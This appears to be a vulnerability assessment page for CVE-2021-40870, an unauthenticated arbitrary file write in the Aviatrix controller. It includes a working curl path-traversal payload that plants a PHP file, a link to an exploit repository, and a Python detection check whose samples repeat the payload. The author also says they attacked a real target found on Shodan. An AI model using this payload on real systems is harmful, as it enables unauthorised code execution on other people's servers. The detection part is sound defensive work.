JoyGhoshs (2)

Last Login: October 09, 2021
Assessments
1
Score
2

JoyGhoshs's Contributions (2)

1

Hey @ccondon-r7, yes, I have performed an active attack against a vulnerable target which I found on Shodan by doing a little search.

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Very High
Technical Analysis

Description

This vulnerability allows an attacker to create and store a file on the Aviatrix controller. The exploitation phase doesn't need any user authentication and doesn't require any other user's interaction; it can simply be exploited using curl. Here is one example.

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'

# After executing the previous command, if the target is vulnerable, this will create a PHP file at this path:

https://vulnerable.target.com/v1/poc 

An attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.

Or you can use this exploit to do the exploitation more easily: https://github.com/JoyGhoshs/CVE-2021-40870

Exploitation
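A detection check for the request shape described in the assessment above, written as an added example that is not part of the original assessment or of any Aviatrix code. It assumes a reverse proxy or WAF hook that can see the POST body; the function name `inspect_request`, the sample requests and the rule that a legitimate `account_name` is a plain identifier are assumptions made for illustration.

```python
from urllib.parse import parse_qs, unquote

# Endpoint and action taken from the request shown in the assessment.
ENDPOINT = "/v1/backend1"
ACTION = "set_metric_gw_selections"


def inspect_request(method, path, body):
    """Return the reasons a request matches the file-write pattern, or []."""
    if method != "POST" or path.split("?")[0].rstrip("/") != ENDPOINT:
        return []
    form = parse_qs(body, keep_blank_values=True)  # percent-decodes once
    if ACTION not in form.get("action", []):
        return []
    reasons = []
    for name in form.get("account_name", []):
        name = unquote(name).replace("\\", "/")  # decode again, unify separators
        # Assumption: a legitimate account name is a plain identifier,
        # so any separator, dot-dot sequence or NUL byte is out of place.
        if "/" in name or ".." in name or "\x00" in name:
            reasons.append("path characters in account_name")
        if name.lower().endswith((".php", ".phtml")):
            reasons.append("account_name ends in a script extension")
    if any("<?" in value for value in form.get("data", [])):
        reasons.append("PHP open tag in data")
    return reasons


# Constructed sample requests (method, path, body); the first mirrors the
# curl command in the assessment, the second is an ordinary-looking call,
# the third carries a form-encoded account_name.
SAMPLES = [
    ("POST", "/v1/backend1",
     "CID=x&action=set_metric_gw_selections"
     "&account_name=/../../../var/www/php/poc.php"
     '&data=hello<?php echo "Vulnerable Poc";?>'),
    ("POST", "/v1/backend1",
     "CID=x&action=set_metric_gw_selections&account_name=prod-account&data=gw1"),
    ("POST", "/v1/backend1",
     "CID=x&action=set_metric_gw_selections&account_name=..%2F..%2Ftmp%2Fa&data=x"),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        hits = inspect_request(method, path, body)
        print("ALERT" if hits else "ok   ", path, hits)
```

Any hit on this endpoint from a client that has not authenticated is worth an alert on its own, since the assessment states the call needs no authentication.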